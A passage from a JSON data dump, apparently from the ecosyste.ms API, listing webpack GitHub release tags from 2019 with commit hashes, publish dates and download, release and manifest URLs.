pack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9",